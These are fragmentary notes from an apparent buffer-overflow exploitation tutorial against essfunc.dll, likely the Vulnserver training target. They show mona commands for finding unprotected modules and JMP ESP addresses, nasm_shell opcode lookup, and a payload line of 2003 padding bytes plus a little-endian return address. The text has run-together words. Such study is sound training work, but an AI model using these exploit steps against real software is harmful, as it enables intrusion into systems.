mona on the program to find protections = falses
!mona modulesAND
connected to the app/client we’re running.
This case, it was essfunc.dll:
We can use nasm shell to find the hex equivalent to a command we want:
locate nasm_shell
#output:
/usr/bin/msf-nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rband ask it what does JMP ESP look like in hex:
JMP ESP
#output:
FFE4
find it in the debugger using Mona:
!mona find -s "\xff\xe4" -m essfunc.dllessfunc.dll is the DLL we identified earlier to be good with protections = false
625011af
625011bb
625011c7
625011d3
625011df
625011eb
625011f7
62501203
62501205when using it:
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" #the hex is backwards: 625011afThis is Little Endian format!